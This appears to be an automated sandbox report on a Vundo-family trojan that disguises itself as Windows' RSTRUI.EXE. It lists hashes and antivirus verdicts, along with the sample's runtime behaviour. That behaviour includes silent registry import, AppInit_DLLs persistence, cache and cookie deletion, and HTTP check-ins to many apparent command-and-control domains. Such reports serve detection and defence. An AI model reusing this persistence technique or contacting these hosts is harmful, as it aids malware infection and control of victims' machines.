Analysis Date: 2014-11-22 10:24:05
MD5: 27693900b327b570d0aa240a2da1fbd9
SHA1: 9f899723711a6fba750a102087c1409d8a2a3c41

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: 2d1ba9174b64608447ea98175109840f  sha1: b210ba5bf7fe4423441d2572a337dd82c256e5a9  size: 91648
Section _ASM2   md5: 62c826d4ddef367d075c0cba0669f0a0  sha1: b240b0ac984e37c53bffb3e34f2fc960b9468d77  size: 63488
Section .rdata  md5: 80759194640cd0c281898748a3c7253b  sha1: dcb925370efdab1968bdce434442f7fbd7245c68  size: 8192
Section .data   md5: 38e766bb1ef49e52025bc1f89e1812ff  sha1: edbc9cadc0cfd216f791595068951582ff10913c  size: 5120
Section .tls    md5: bf619eac0cdf3f68d496ea9344137e8b  sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5  size: 512
Section .rsrc   md5: c57f9dda23e74dc2dffbaa3c8425f4c6  sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037  size: 34304
Timestamp: 2012-09-25 04:15:44
Version:
  LegalCopyright: © Корпорация Майкрософт. Все права защищены.
  InternalName: RSTRUI.EXE
  FileVersion: 5.1.2600.5512 (xpsp.080413-2108)
  CompanyName: Корпорация Майкрософт
  ProductName: Операционная система Microsoft® Windows®
  ProductVersion: 5.1.2600.5512
  FileDescription: Приложение восстановления системы
  OriginalFilename: RSTRUI.EXE
Packer: Microsoft Visual C++ ?.?
PEhash: ed7168502630d6f765608bf68788c6f93aa2bee5
IMPhash: 11c52178b812c23b7febf02fc8e99619
AV 360 Safe: Gen:Variant.Spy.5
AV Ad-Aware: Gen:Variant.Spy.5
AV Alwil (avast): Vundo-XF [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Cidox.A.gen!Eldorado
AV Avira (antivir): TR/Vundo.Gen7
AV BullGuard: Gen:Variant.Spy.5
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Trojan.Vundo.Gen
AV ClamAV: WIN.Trojan.Agent-164717
AV Dr. Web: Trojan.Inject1.10169
AV Emsisoft: Gen:Variant.Spy.5
AV Eset (nod32): Win32/Kryptik.AMFU
AV Fortinet: W32/Citirevo.AB!tr
AV Frisk (f-prot): W32/Cidox.A.gen!Eldorado
AV F-Secure: Gen:Variant.Spy.5
AV Grisoft (avg): Generic_r.BGN
AV Ikarus: Trojan-Downloader.Win32.Vundo
AV K7: Backdoor ( 04c4f2bf1 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Trojan.FakeMS.ED
AV Mcafee: Vundo-FASV!27693900B327
AV Microsoft Security Essentials: TrojanDropper:Win32/Vundo.V
AV MicroWorld (escan): Gen:Variant.Spy.5
AV Rising: no_virus
AV Sophos: Mal/Vundo-M
AV Symantec: Trojan.Gen.2
AV Trend Micro: TROJ_VUNDO.SMKK
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File: C:\WINDOWS\system32\hyjrqnc.dll
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS: clickbeta.ru
Winsock DNS: denadb.com
Winsock DNS: 91.220.35.154
Winsock DNS: terrans.su
Winsock DNS: tryatdns.com
Winsock DNS: clickclans.ru
Winsock DNS: denareclick.com
Winsock DNS: fescheck.com
Winsock DNS: instrango.com
Winsock DNS: verzinla.com
Winsock DNS: getintsu.com
Winsock DNS: tegimode.com
Winsock DNS: netrovad.com
Winsock DNS: nshouse1.com
Winsock DNS: veriolana.com
Winsock DNS: inzavora.com
Winsock DNS: odobvare.com
Winsock DNS: foradns.com
Winsock DNS: getavodes.com
Winsock DNS: clickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\hyjrqnc.dll\\x00

Network Details:

DNS getintsu.com  Type: A  ➝ 141.8.225.80
DNS getavodes.com  Type: A  ➝ 141.8.225.80
DNS tryatdns.com  Type: A  ➝ 209.222.14.3
DNS fescheck.com  Type: A  ➝ 209.222.14.3
DNS instrango.com  Type: A  ➝ 204.11.56.26
DNS inzavora.com  Type: A  ➝ 141.8.225.80
DNS denadb.com  Type: A  ➝ 204.11.56.26
DNS foradns.com  Type: A  ➝ 141.8.225.62
DNS veriolana.com  Type: A
DNS verzinla.com  Type: A
DNS netrovad.com  Type: A
DNS odobvare.com  Type: A
DNS terrans.su  Type: A
DNS tegimode.com  Type: A
DNS clickstano.com  Type: A
DNS denareclick.com  Type: A
DNS clickbeta.ru  Type: A
DNS nshouse1.com  Type: A
DNS clickclans.ru  Type: A
HTTP GET: http://getintsu.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7MhHYfvVjdvm
  User-Agent:
HTTP GET: http://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7KXq7TYIaWNT
  User-Agent:
HTTP GET: http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7GWqf3nLQkm3
  User-Agent:
HTTP GET: http://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7C2CLOdXR1x7
  User-Agent:
HTTP GET: http://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7Bf8bvoXlKnf
  User-Agent:
HTTP GET: http://inzavora.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7MhHYfvVjdvm
  User-Agent:
HTTP GET: http://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7EZ5+AFDzOit
  User-Agent:
HTTP GET: http://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7DU5SDo9CRU2
  User-Agent:
HTTP GET: http://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=736&av=0&vm=0&al=0&p=679&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygw2JwOG82KFAZlIT5KwZObclCotGc0nx7B4l6AvLbvw9
  User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1033 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1034 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1035 ➝ 204.11.56.26:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 204.11.56.26:80
Flows TCP: 192.168.1.1:1038 ➝ 141.8.225.62:80
Flows TCP: 192.168.1.1:1039 ➝ 91.220.35.154:80

Raw Pcap

Strings